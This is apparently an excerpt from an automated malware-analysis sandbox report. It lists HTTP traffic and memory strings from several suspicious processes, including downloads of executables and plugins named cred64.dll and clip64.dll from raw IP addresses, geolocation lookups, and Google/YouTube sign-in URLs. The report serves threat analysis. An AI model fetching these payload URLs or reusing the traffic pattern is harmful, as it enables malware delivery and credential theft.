Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=212160193&timestamp=1713476453637 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCPnA1BUIpu3MIhj2yc0BGNXdzQEY0/7NARjYhs4BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /widget/demo/81.181.57.52 HTTP/1.1Connection: Keep-AliveReferer: https://ipinfo.io/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: ipinfo.io
Source: global traffic HTTP traffic detected: GET /demo/home.php?s=81.181.57.52 HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: db-ip.com
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /mine/amert.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.56
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/cred64.dll HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /cost/sarra.exe HTTP/1.1Host: 193.233.132.167
Source: global traffic HTTP traffic detected: GET /enigma/Plugins/clip64.dll HTTP/1.1Host: 193.233.132.167
Source: bad48ea9ac.exe, 0000001F.00000002.2819404632.0000000003F66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: bad48ea9ac.exe, 0000000F.00000003.2686052943.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2684405158.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000002.2690945819.0000000003E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/accountt equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000002.2754944956.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Dl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000002.2754944956.0000000007C98000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Dl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=03K1P equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: andle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: andle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736090704.0000000007D99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2737331559.0000000007D99000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736090704.0000000007D99000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: esktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2737331559.0000000007D99000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736090704.0000000007D99000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: esktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_h equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0a/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0aYouTube equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0aYouTube/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0asive equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000002.2754944956.0000000007CD8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/InteractiveLogin?continue=https://www.youtube.com/signin?action_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&passive=true&service=youtube&uilel=3&ifkv=ARZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0ayouty1 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738400789.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en"D equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enYouTube equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enYouTube/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=ensE~ equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsig equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm= equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0YouTube equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738559574.0000000007D9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0zy1 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2736090704.0000000007D99000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://go.microsoft.com/fwlink/?linkid=851546-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016pk2016&ui=en-us&rs=en-us&ad=uspk2016&ui=en-us&rs=en-us&ad=usapp%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=enZ0qKKdZMcv_BTjN9lyrdTFx5G5WmlfwerRYTc2v8HQ8jQwqjXuzU5RtX1i-oHITuYm0EKocR0aoutube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: 590971cd60.exe, 00000014.00000003.2582617431.0000000007F5E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2734561741.0000000007CF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: bad48ea9ac.exe, 0000000F.00000003.2686052943.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2684405158.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2687568679.0000000003DA1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2738990555.0000000007D02000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736983747.0000000007D00000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2754944956.0000000007CF2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/account/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountYouTube equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736489776.0000000007D02000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountYouTube/t equals www.youtube.com (Youtube)
Source: bad48ea9ac.exe, 0000001F.00000003.2813883212.0000000003BDE000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2810834359.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000001F.00000003.2808553560.0000000003BD5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountn equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0 equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2735982624.0000000007CF3000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2736140221.0000000007D04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en&ifkv=ARZ0qKIzNO5PzowjRVz7tH8FQmowcRfBFxEjXfeNJy7Tjy2K9F5fh7UdsRSL3K1PUc2urKuJAjjblg&passive=true&service=youtube&uilel=3&flowName=GlifWebSignIn&flowEntry=ServiceLogin&dsh=S1107944685%3A1713476414694434&theme=mn&ddm=0/t equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2737384071.0000000007CDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en equals www.youtube.com (Youtube)
Source: MPGPH131.exe, 00000026.00000003.2737384071.0000000007CDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: nts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3Dhttps%253A%252F%252Fwww.youtube.com%252Faccount%26feature%3Dredirect_login&hl=en/t equals www.youtube.com (Youtube)
Source: unknown DNS traffic detected: queries for: www.youtube.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true&authuser=0 HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 931sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"Content-Type: text/plain;charset=UTF-8sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"X-Goog-AuthUser: 0sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Origin: https://accounts.google.comX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://147.45.47.102:57893/hera/amadka.exe
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/
Source: chrosha.exe, 00000010.00000002.2907399446.000000000105D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/8r
Source: explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/A2E7B-21CB-41b2-A086-B309680C6B7E
Source: chrosha.exe, 00000010.00000002.2907399446.000000000102E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/SOR_LEVEL=6PROCESSOR_RE
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exe
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/go.exe0.1
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exe
Source: MPGPH131.exe, 00000026.00000002.2749346705.0000000001409000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exe192.168.0Yx8
Source: 590971cd60.exe, 00000014.00000002.2888771295.00000000018AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/lenin.exexr
Source: explorha.exe, 00000006.00000003.2451665041.000000000073E000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/random.exe
Source: explorha.exe, 00000006.00000003.2451665041.000000000073E000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.2899294419.0000000000740000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://193.233.132.167/cost/random.exel
